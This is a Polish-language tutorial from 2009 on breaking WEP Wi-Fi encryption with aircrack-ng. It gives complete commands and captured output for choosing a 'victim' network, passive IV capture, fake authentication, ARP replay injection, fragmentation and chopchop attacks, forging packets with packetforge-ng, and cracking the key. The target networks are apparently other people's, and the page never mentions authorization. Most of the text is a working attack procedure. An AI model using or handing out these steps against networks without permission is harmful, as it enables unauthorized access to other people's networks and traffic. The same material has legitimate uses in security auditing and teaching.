Atak na sieć zabezpieczoną WEP
Ostatnia aktualizacja: 27 lipca 2009
strona główna
Szukanie ofiary
Pakiet aircrack składa się z wielu programów, do najczęściej używanych - i prawdopodobnie najważniejszych - należą jednak airodump-ng, aireplay-ng oraz aircrack-ng. Ten pierwszy służy do nasłuchiwania w celu pobrania danych potrzebnych do złamania klucza, drugi - do injekcji pakietów do sieci w celu szybszego pozyskania IV, trzeci - do złamania klucza w oparciu o pozyskane już IV.
Atak zawsze musimy zacząć od znalezienia ofiary. W tym celu odpalamy airodump następującą komendą :
# airodump-ng mon0
Uruchomi to airodump w trybie nasłuchiwania na wszystkich kanałach na interfejsie mon0. Dzięki temu wyświetli nam się ekran podobny do takiego :
CH 10 ][ Elapsed: 24 s ][ 2008-08-16 20:59
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:A0:37:C3:D1:CB 219 103 9 0 3 54 . WEP WEP NoSexPlease
00:1E:37:0E:D7:CE 175 35 2 0 10 54 WEP WEP neostrada_bac6
00:16:41:8D:48:7E 174 14 66 2 10 54 OPN neostrada_c838
00:1D:0F:EA:6F:A4 168 8 7 0 6 54 . OPN TP-LINKGR7
BSSID STATION PWR Rate Lost Packets Probe
00:A0:37:C3:D1:CB 06:19:E0:88:6A:4C 167 0- 1 0 8 NoSexPlease
00:16:41:8D:48:7E 00:60:B3:44:23:B7 -1 1- 0 0 66
00:1D:0F:EA:6F:A4 00:1B:63:C9:6B:47 170 0-12 0 6
W pierwszej "części" okna mamy przedstawione dostępne access pointy, wraz z dostępnymi dla nich statystykami. BSSID oznacza adres MAC access pointa. Wskazanie PWR teoretycznie wskazuje moc odbieranego sygnału, jednak jednostka i sposób przedstawiania tej wielkości różni się wraz z sterownikami. Beacons to liczba odebranych tzw. beacon frames - o nich więcej w poprzednim rozdziale. #Data to ilość IV odebranych pochodzących z danego access point'a. #/s to ilość IV na sekundę przepływających przez dany access point. CH wskazuje kanał, na którym pracuje. MB to maksymalna szybkość transferu obsługiwana przez dany access point. ENC oznacza wykorzystywane przez dany access point szyfrowanie. CIPHER - rodzaj klucza. AUTH - rodzaj uwierzytelniania. ESSID - nazwę access pointa.
W "dolnej" części okna, pod access pointami, mamy listę klientów wykrytych przez kartę. BSSID tutaj oznacza adres MAC access pointa, do którego dany klient jest podłączony. STATION to adres MAC klienta. PWR to siła sygnału odbieranego od klienta. Rate to szybkość, z jaką w danym momencie pracuje klient. Lost - liczba pakietów straconych. Packets - liczba pakietów ogólnie. Probe - ESSID access pointa, do którego jest podłączony klient.
Jak widać, program ten dostarcza nam bardzo wielu informacji na podstawie których możemy rozpocząć atak. Najbardziej na tą chwilę interesować nas będą kanał, na którym nadaje interesujący nas access point, oraz jego BSSID. Posłużą one nam do uruchomienia airodumpa w bardziej "konkretnym" trybie, tak, aby nasłuchiwał dane tylko danego AP.
W moim przykładzie zajmę się tym AP, który akurat jest pierwszy na liście - działającym na kanale trzecim o BSSID 00:A0:37:C3:D1:CB. Zatrzymuję więc airodump aktualnie działający (Control-C) i uruchamiam go jeszcze raz, ale trochę inaczej :
# airodump-ng -c 3 --bssid 00:A0:37:C3:D1:CB -w capture mon0
Spowoduje to uruchomienie airodump'a tylko na kanale trzecim, nasłuchującego na dane przychodzące tylko od AP, którego BSSID to 00:A0:37:C3:D1:CB, i zapisującego wszystkie dane do pliku capture, na interfejsie mon0. Ukazuje nam się mniej więcej taki ekran :
CH 3 ][ Elapsed: 32 s ][ 2008-08-16 21:16
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:A0:37:C3:D1:CB 218 100 312 1927 223 3 54 . WEP WEP NoSexPlease
BSSID STATION PWR Rate Lost Packets Probe
00:A0:37:C3:D1:CB 06:19:E0:88:6A:4C 170 0-24 1005 16
Jak widać, wiele się nie zmieniło - w górnej części okna doszła tylko dodatkowa kolumna RXQ, która oznacza jakość odbieranego sygnału. Niestety, jest to w większości przypadków tylko bardzo niedokładne oszacowanie.
Tym sposobem mamy już ofiarę. Pora więc na atak.
Atak
Jest bardzo wiele sposobów, dzięki którym możemy złamać access point zabezpieczony szyfrowaniem WEP (o WPA trochę później). Opiszę parę z nich, ale nie są to wszystkie możliwości. Aby złamać klucz WEP, potrzebujemy około stu tysięcy IV. Pliki z przechwytywanymi danymi potrafią być bardzo duże, warto więc upewnić się, że mamy na dysku trochę miejsca (300MB powinno wystarczyć).
Atak pasywny
Stosowany tylko i wyłącznie w sieciach bardzo aktywnych. W sumie nie jest to forma ataku na sieć (sam atak pasywny jakoś dziwnie brzmi, ale nie miałem lepszego pomysłu na nazwę), ponieważ nie wysyłamy do niej żadnych danych, tylko "odgadujemy" klucz na podstawie zebranych przez nas danych.
Atak ten ogranicza się do uruchomienia airodump-ng i czekania, aż przy naszym access poincie pojawi się wystarczająco duża liczba pakietów. Przykład :
CH 3 ][ Elapsed: 1 min ][ 2008-08-16 21:28
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:A0:37:C3:D1:CB 220 100 677 81745 1342 3 54 . WEP WEP NoSexPlease
BSSID STATION PWR Rate Lost Packets Probe
00:A0:37:C3:D1:CB 06:19:E0:88:6A:4C 169 0-18 0 2856
W tej sytuacji nasza interwencja jest absolutnie niepotrzebna. Uruchamiamy tylko aircrack i czekamy na odgadnięcie klucza.
$ aircrack-ng capture-04.cap
Opening capture-04.cap
Read 131412 packets.
# BSSID ESSID Encryption
1 00:A0:37:C3:D1:CB NoSexPlease WEP (81745 IVs)
Choosing first network as target.
Opening capture-04.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 81745 ivs.
Aircrack-ng 1.0 rc1 r1147
[00:00:00] Tested 30724 keys (got 81745 IVs)
KB depth byte(vote)
0 0/ 1 41(113408) 4C(96256) 1B(94976) 49(94464) CC(93184) 2E(92160) AA(92160)
1 0/ 1 46(115200) E2(96768) 02(95744) AA(95488) 60(94464) 8B(94464) 31(93952)
2 0/ 1 08(102144) 38(93184) AE(92672) CA(91904) 68(91392) 42(90880) 3A(90624)
3 0/ 1 84(112896) 84(92160) CA(92160) 3B(91392) 7B(91392) B1(91136) 52(90880)
4 0/ 1 69(109568) AB(97280) 00(90880) 03(90368) A6(90368) 54(90112) A2(89856)
5 0/ 1 E1(105216) 07(96512) 27(94464) 7B(92416) 00(90880) 4B(90368) 5E(90368)
6 0/ 1 5C(113408) 60(93184) E4(93184) 81(92928) CE(91392) 8D(90368) 1C(90112)
7 0/ 1 09(103936) 13(93696) 32(93696) 50(91904) FF(90880) 18(90624) F1(90368)
8 0/ 1 C3(112128) 88(95488) E3(91136) A6(90368) 4F(89856) 70(89856) 9F(89600)
9 0/ 1 75(107264) 20(94720) F2(91648) 1E(90880) 3B(90112) 72(90112) E0(90112)
10 0/ 1 93(93440) 58(92672) 62(91904) 75(91392) 96(91392) 0F(91136) A0(90368)
11 0/ 1 0A(94464) 4C(94464) BA(93696) 41(93440) D6(91904) C5(91392) 65(91136)
12 0/ 1 15(108652) AB(92520) B2(90796) 77(89548) 46(89508) 02(89072) 37(88988)
KEY FOUND! [ 41:46:08:84:69:E1:5C:09:C3:75:78:02:15 ]
Decrypted correctly: 100%
Tym sposobem mamy gotowy klucz do naszej sieci.
Atak aktywny z wykorzystaniem już istniejących pakietów ARP
Pierwszy typ ataku aktywnego, stosujemy go, gdy w sieci istnieje bardzo niewielka aktywność, a my nie mamy cierpliwości, aby czekać na następne pakiety. Możemy przyspieszyć zbieranie danych poprzez wykorzystanie tzw. reinjekcji ARP. ARP to pakiety, dzięki którym następuje translacja adresu IP na adres MAC danego urządzenia. Cały trik polega na tym, że gdy odeślemy do naszego AP pakiet ARP, ten będzie musiał go rozgłosić po wszystkich możliwych interfejsach - razem z tym generuje nowe, nas interesujące IV. Powiedzmy, że na oku mam następującą ofiarę :
CH 8 ][ Elapsed: 1 min ][ 2008-08-16 21:42
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:32:3F:B6:00:A5 218 100 689 6 0 8 54 . WEP WEP Hooligan
BSSID STATION PWR Rate Lost Packets Probe
Jak widać, nowych IV jak na lekarstwo, a mi się bardzo spieszy. Użyjemy więc aktywnego ataku. Jednak zanim będziemy mogli cokolwiek zrobić, musimy połączyć się z AP i zostać przez niego uwierzytelnieni. W tym celu potrzebny jest fakeauth, jeden z ataków aireplay'a. Wywołujemy go - w tym przypadku - następującą komendą :
# aireplay-ng -1 0 -e Hooligan -b 00:32:3F:B6:00:A5 ath0
Spowoduje to połączenie się (-1 0 - cyfra 0 oznacza odstęp między próbami połączenia się, w sekundach) z AP o ESSID Hooligan i BSSID 00:32:3F:B6:00:A5 na interfejsie ath0. Jeśli wszystko pójdzie w porządku, zobaczymy coś takiego :
No source MAC (-h) specified. Using the device MAC (00:19:E0:88:6A:4C)
22:09:23 Waiting for beacon frame (ESSID: Hooligan) on channel 8
Found BSSID "00:32:3F:B6:00:A5" to given ESSID "Hooligan".
22:09:23 Sending Authentication Request (Open System)
22:09:23 Authentication successful
22:09:23 Sending Association Request
22:09:23 Association successful :-) (AID: 1)
Oznacza to, że udało nam się bezproblemowo połączyć z danym AP i możemy teraz wysyłać do niego dane. Aireplay po zakończeniu połączenia zamknie się i wróci do powłoki.
Zakładając, że jesteśmy już połączeni z AP, pora na samą injekcję. Aby tego dokonać, najpierw uruchamiamy airodump-ng tak, aby nasłuchiwał i przechwytywał na kanale naszego AP dane tylko i wyłącznie naszego AP, a następnie uruchamiamy następną konsolę (lub kartę - przydatna rzecz) i w niej zaczynamy injekcję. Aireplay wywołujemy komendą :
# aireplay-ng -3 -e Hooligan -b 00:32:3F:B6:00:A5 mon0
Spowoduje to uruchomienie aireplay w trybie reinjekcji ARP (-3), na AP o ESSID Hooligan i BSSID 00:32:3F:B6:00:A5, na interfejsie mon0. Po uruchomieniu zobaczymy :
No source MAC (-h) specified. Using the device MAC (00:1F:3B:59:A7:0F)
22:27:26 Waiting for beacon frame (BSSID: 00:32:3F:B6:00:A5) on channel 8
Saving ARP requests in replay_arp-0816-222726.cap
You should also start airodump-ng to capture replies.
Read 7 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
Aby móc z powrotem wstrzykiwać pakiety ARP, aireplay musi najpierw jeden z takich dostać - jeśli mamy przez bardzo długi czas got 0 ARP requests, to atak się nie uda i będziemy musieli spróbować następnego sposobu zaatakowania takiego AP (tj. opisanego w następnym rozdziale). Jeśli jednak wszystko pójdzie tak, jak powinno, to aplikacja powinna zwracać tekst mniej więcej taki :
No source MAC (-h) specified. Using the device MAC (00:1F:3B:59:A7:0F)
22:29:15 Waiting for beacon frame (BSSID: 00:32:3F:B6:00:A5) on channel 8
Saving ARP requests in replay_arp-0816-222915.cap
You should also start airodump-ng to capture replies.
Read 77465 packets (got 73770 ARP requests and 0 ACKs), sent 40541 packets...(499 pps)
Oznacza to, że atak zadziałał i aktualnie karta przesyła otrzymane pakiety ARP. W tym czasie airodump powinien wyglądać mniej więcej tak :
CH 8 ][ Elapsed: 5 mins ][ 2008-08-16 22:30
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:32:3F:B6:00:A5 217 89 3428 36007 439 8 54 . WEP WEP Hooligan
BSSID STATION PWR Rate Lost Packets Probe
00:32:3F:B6:00:A5 00:1F:3B:59:A7:0F 0 1- 1 234277 79254 Hooligan
Jak widzimy, IV na sekundę przybywa bardzo dużo - więc to, kiedy będziemy mieli ich wystarczająco dużo, jest wyłącznie kwestią (bardzo krótkiego) czasu. Jeśli uzbieraliśmy ich już około stu tysięcy, nie pozostaje nam nic innego jak uruchomić aircrack.
$ aircrack-ng capture*.cap
Opening capture-01.cap
Opening capture-02.cap
Opening capture-03.cap
Read 237540 packets.
# BSSID ESSID Encryption
1 00:32:3F:B6:00:A5 Hooligan WEP (74349 IVs)
Choosing first network as target.
Opening capture-01.cap
Opening capture-02.cap
Opening capture-03.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 74349 ivs.
Aircrack-ng 1.0 rc1 r1147
[00:00:00] Tested 605 keys (got 74347 IVs)
KB depth byte(vote)
0 0/ 2 2B(101888) A1(84224) 43(83968) E2(83968) 19(83712) D6(83456) 47(83200)
1 3/ 4 10(85760) AE(83968) FC(83712) 00(83456) AA(83456) F2(82944) A9(81408)
2 1/ 2 B3(85504) 59(83968) E7(83968) 16(83712) 31(82944) D8(82944) 48(82688)
3 0/ 3 A4(103168) 3F(86784) C4(86272) CE(83712) FD(83712) E6(83456) BB(82432)
4 55/ 4 D9(78080) 24(77824) 26(77824) 2F(77824) 52(77824) 96(77824) AB(77824)
KEY FOUND! [ 2B:DA:CF:F2:6C:F5:88:87:4A:CE:70:E3:04 ]
Decrypted correctly: 100%
Mamy więc nasz klucz.
Atak aktywny z wykorzystaniem własnego pakietu ARP
Jeśli nasz poprzedni atak się nie udał, ale w sieci jest ruch, chociaż mały, możemy go wykorzystać do utworzenia swojego własnego pakietu ARP, którego "wstrzykniemy" do sieci w celu uzyskania odpowiedzi i - w związku z tym - nowych IV. Moja ofiara jest następująca :
CH 5 ][ Elapsed: 2 mins ][ 2008-08-16 23:03
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:D2:BD:51:A0:42 208 64 1585 78 1 5 54 . WEP WEP OPN DeathAndAllHisFriends
BSSID STATION PWR Rate Lost Packets Probe
00:D2:BD:51:A0:42 00:1F:3B:59:A7:0F 0 1- 0 0 64 DeathAndAllHisFriends
00:D2:BD:51:A0:42 00:13:E8:BA:B5:59 0 11e1 3 19 DeathAndAllHisFriends
Jak widzimy, ruchu niewiele, a aireplay w karcie obok pokazuje, że ARPów żadnych nie ma. Co więc robić? Ano uruchomić aireplay, ale w trochę innym trybie, mianowicie w trybie ataku fragmentacji. Pamiętajmy jednak, że najpierw musimy połączyć się z AP poprzez fakeauth!
# aireplay-ng -5 -e DeathAndAllHisFriends -b 00:D2:BD:51:A0:42 mon0
Komenda ta spowoduje uruchomienie aireplay'a w trybie ataku fragmentacji (-5), celem którego będzie AP o ESSID DeathAndAllHisFriends i BSSID 00:D2:BD:51:A0:42. Injekcja odbędzie się na interfejsie mon0. W wyniku komendy otrzymujemy na początku :
No source MAC (-h) specified. Using the device MAC (00:1F:3B:59:A7:0F)
23:01:37 Waiting for beacon frame (BSSID: 00:D2:BD:51:A0:42) on channel 5
23:01:37 Waiting for a data packet...
Read 535 packets...
Aireplay czeka na pakiet zawierający dane. Gdy taki otrzyma, naszym oczom ukaże się jego zawartość :
Size: 368, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:D2:BD:51:A0:42
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:13:E8:BA:B5:59
0x0000: 0862 0000 ffff ffff ffff 00d2 bd51 a042 .b...........Q.B
0x0010: 0013 e8ba b559 c0f9 f355 f100 aed1 bae8 .....Y...U......
0x0020: 434b 3d73 df3f 2184 4ac8 8dd8 8052 f07b CK=s.?!.J....R.{
0x0030: 1f79 845b 05dc 8cd1 c560 db58 1fe6 73d9 .y.[.....`.X..s.
0x0040: 796a 5786 0daf 7e1f 8426 c223 d0dc 5811 yjW...~..&.#..X.
0x0050: 99cd 93c6 d612 ecbb f344 2c41 72c0 f3cb .........D,Ar...
0x0060: 062c 9a04 2143 7a16 770e e830 38ff e924 .,..!Cz.w..08..$
0x0070: 5eaa 671a d33a d25a 08dc 79aa 8fe3 b2e3 ^.g..:.Z..y.....
0x0080: 2cd6 8cf3 fd9c daa5 e96f 46f3 cc59 281a ,........oF..Y(.
0x0090: c025 d7a3 aeec cbb7 8b2f 632f 29c4 3a37 .%......./c/).:7
0x00a0: 7c5d 47bd 8b9f b5cb 31a0 bf8e fd12 1fbd |]G.....1.......
0x00b0: 1984 26d4 cd46 1e71 654c d864 672e 411d ..&..F.qeL.dg.A.
0x00c0: 01ee 11ed 53b9 8405 541c ac90 11bb ccea ....S...T.......
0x00d0: a511 cfa2 c982 7a6d 993d 7f80 4401 792f ......zm.=p.D.y/
--- CUT ---
Use this packet ?
Rzeczą w tym momencie najważniejszą jest wielkość pakietu. Musi ona być koniecznie większa bądź taka sama jak wielkość pakietu, który chcemy utworzyć. Jako że interesuje nas utworzenie pakietu ARP, który zajmuje 68 bajtów, pakiet użyty do fragmentacji musi mieć wielkość taką samą lub większą. Widoczny tutaj pakiet idealnie się do tego nadaje, jako że zajmuje aż 368 bajtów. Jeśli aireplay zwróci nam pakiet mniejszy, nie martwmy się - odpowiedzmy na zadane pytanie "n" i czekajmy na następny, większy. W przypadku takiego, jak ten, naciskamy "y" i potwierdzamy enterem, w wyniku czego pokazuje się nam :
Saving chosen packet in replay_src-0816-230232.cap
23:02:40 Data packet found!
23:02:40 Sending fragmented packet
23:02:40 Got RELAYED packet!!
23:02:40 Trying to get 384 bytes of a keystream
23:02:40 Got RELAYED packet!!
23:02:40 Trying to get 1500 bytes of a keystream
23:02:40 Got RELAYED packet!!
Saving keystream in fragment-0816-230240.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Są to komunikaty potwierdzające powodzenie ataku fragmentacji. W jego wyniku na naszym dysku pokazał się plik (w tym przypadku) fragment-0816-230240.xor. Ten plik, zwany PRGA, możemy też pozyskać korzystając z ataku chopchop (-4). Jego składnia jest dokładnie taka sama (czyli w aireplayu zamianiamy po prostu -5 na -4), a pozyskany plik też niczym się nie różni od tego pozyskanego przy ataku fragmentacji. Jako że fragmentacja może nie działać przy niektórych AP, warto wiedzieć, że istnieje też chopchop (nie opisuję go jako głównego ataku, bo jest trochę wolniejszy). Korzystając z niego, możemy utworzyć normalny pakiet, wykorzystując do tego celu program packetforge-ng. Wywołujemy go komendą :
$ packetforge-ng -0 -a 00:D2:BD:51:A0:42 -h 00:1F:3B:59:A7:0F -k 255.255.255.255 -l 255.255.255.255 -w arp_packet -y fragment-0816-230240.xor
Spowoduje to utworzenie pakietu ARP (-0) wysłanego do BSSID 00:D2:BD:51:A0:42 z klienta o adresie 00:1F:3B:59:A7:0F (tj. naszego własnego). Pakiet pochodzi z adresu IP 255.255.255.255 i jest wysyłany do adresu 255.255.255.255 (większość APów odpowiada na takie ARPy - dzięki czemu nie musimy znać dokładnych adresów IP). Pakiet zostanie zapisany do pliku arp_packet, a do jego utworzenia zostanie użyty plik fragment-0816-230240.xor. Jako potwierdzenie program zwróci nam Wrote packet to: arp_packet.
Teraz pora tego pakietu użyć. W tym celu uruchamiamy aireplay w trybie interaktywnej selekcji pakietu :
# aireplay-ng -2 -r arp_packet mon0
Po uruchomieniu zostanie nam przedstawiona zawartość pakietu zawartego w pliku arp_packet i pytanie, czy na pewno chcemy go użyć.
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:D2:BD:51:A0:42
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:1F:3B:59:A7:0F
0x0000: 0841 0201 00d2 bd51 a042 001f 3b59 a70f .A.....Q.B..;Y..
0x0010: ffff ffff ffff 8001 4056 f100 b4c2 36b8 ........@V....6.
0x0020: 8e2c cbf6 8827 32d7 1e6b e70f 6688 eed4 .,...'2..k..f...
0x0030: 7cb0 f7a5 c8dd 5262 a6c7 791e 02b7 e8c0 |.....Rb..y.....
0x0040: c917 cbab ....
Use this packet ?
Wpisujemy oczywiście "y" i naciskamy enter. Uruchamiamy też airodump. Po chwili aplikacja zwraca nam :
Saving chosen packet in replay_src-0816-231744.cap
You should also start airodump-ng to capture replies.
Sent 35036 packets...(499 pps)
Co potwierdza injekcję. W tym samym czasie airodump powinien wyglądać mniej więcej tak :
CH 5 ][ Elapsed: 2 mins ][ 2008-08-16 23:25
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:D2:BD:51:A0:42 207 0 1527 47921 420 5 54 . WEP WEP DeathAndAllHisFriends
BSSID STATION PWR Rate Lost Packets Probe
00:D2:BD:51:A0:42 00:13:E8:BA:B5:59 213 48-54 0 942 DeathAndAllHisFriends
00:D2:BD:51:A0:42 06:19:E0:88:6A:4C 172 0-11 0 93
00:D2:BD:51:A0:42 00:1F:3B:59:A7:0F 0 1- 0 39642 109956 DeathAndAllHisFriends
Co jest potwierdzeniem sprawnej injekcji. Teraz trzeba tylko chwilkę poczekać i uruchomić aircrack.
$ aircrack-ng death*.cap
Opening death-01.cap
Opening death-02.cap
Read 282047 packets.
# BSSID ESSID Encryption
1 00:D2:BD:51:A0:42 DeathAndAllHisFriends WEP (63056 IVs)
Choosing first network as target.
Opening death-01.cap
Opening death-02.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 63342 ivs.
Aircrack-ng 1.0 rc1 r1147
[00:00:00] Tested 892 keys (got 61307 IVs)
KB depth byte(vote)
0 0/ 9 76(76800) B1(69632) 8D(69376) 7D(69120) 22(68864) 02(68352) 17(68096) 70(68096)
1 0/ 1 28(88320) 5D(72448) 05(71680) 1B(70912) A2(70144) C5(69888) 29(69632) C7(69632)
2 0/ 1 9A(95488) 50(74496) 69(72192) 04(70400) 4F(70400) 8B(70400) DD(69376) EF(69376)
3 0/ 3 AC(86016) 49(71424) 35(70400) D8(69888) 5C(69376) C0(69120) F4(69120) 5B(68608)
4 7/ 4 F3(68352) 57(68096) B7(68096) 89(67840) 35(67584) 37(67584) E4(67584) 5B(67328)
KEY FOUND! [ 76:22:9A:7A:C3:0D:FA:A2:EA:29:4A:EF:56 ]
Decrypted correctly: 100%
Znowu odzyskaliśmy klucz.
To już tyle, jeśli chodzi o łamanie WEPów. Jest jednak jeszcze dużo innych ataków - możliwości aircracka są naprawdę wielkie, tutaj została przedstawiona tylko ich bardzo niewielka część!
strona główna